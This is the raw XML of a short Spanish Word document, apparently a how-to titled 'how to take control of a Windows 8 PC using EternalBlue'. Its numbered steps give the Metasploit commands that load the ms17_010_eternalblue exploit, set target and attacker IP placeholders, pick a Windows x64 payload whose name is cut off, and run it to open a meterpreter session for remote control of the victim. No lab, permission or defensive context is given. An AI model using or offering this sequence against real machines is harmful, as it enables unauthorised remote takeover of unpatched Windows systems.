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A413" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172">
      <w:r>
        <w:t xml:space="preserve">Como tomar control de un PC con Windows 8 usando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C4320F" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172" w:rsidP="00945172">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Asegúrate de que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> esté instalado y configurado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC15C64" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172"/>
    <w:p w14:paraId="61023461" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172" w:rsidP="00945172">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abra una consola de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y escriba los siguientes comandos para cargar el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EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA05517" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172" w:rsidP="00945172">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DED23C2" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172"/>
    <w:p w14:paraId="2D817922" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172">
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B10D4E8" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172"/>
    <w:p w14:paraId="2FC4B408" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172">
      <w:r>
        <w:t>Set RHOST &lt;IP_DEL_OBJETIVO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283B5207" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172"/>
    <w:p w14:paraId="06C69616" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172">
      <w:r>
        <w:t xml:space="preserve">Set PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x64/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</w:p>
    <w:p w14:paraId="0B787EAC" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172"/>
    <w:p w14:paraId="28A03433" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172" w:rsidP="00945172">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Configure una dirección local para el atacante usando el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FF4658" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172"/>
    <w:p w14:paraId="703A722F" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172">
      <w:r>
        <w:t>Set LHOST &lt;IP_DEL_ATACANTE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B7B93" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172"/>
    <w:p w14:paraId="3E006BAD" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172" w:rsidP="00945172">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ejecuta el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> usando el comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312FAB4F" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172"/>
    <w:p w14:paraId="0CCBB8EA" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8199DC" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172"/>
    <w:p w14:paraId="4CF8773F" w14:textId="77777777" w:rsidR="00945172" w:rsidRDefault="00945172" w:rsidP="00945172">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> es exitoso, se abrirá una sesión </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en el objetivo. Puedes utilizar los comandos de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para tomar control remoto de la máquina.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009451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53BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A05EB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8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72"/>
    <w:rsid w:val="009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5A337"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4BC343C5-443D-DA44-83D7-CF641BA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kyuneushwastein wastein</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>kyuneushwastein wastein</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-13T05:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-13T05:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>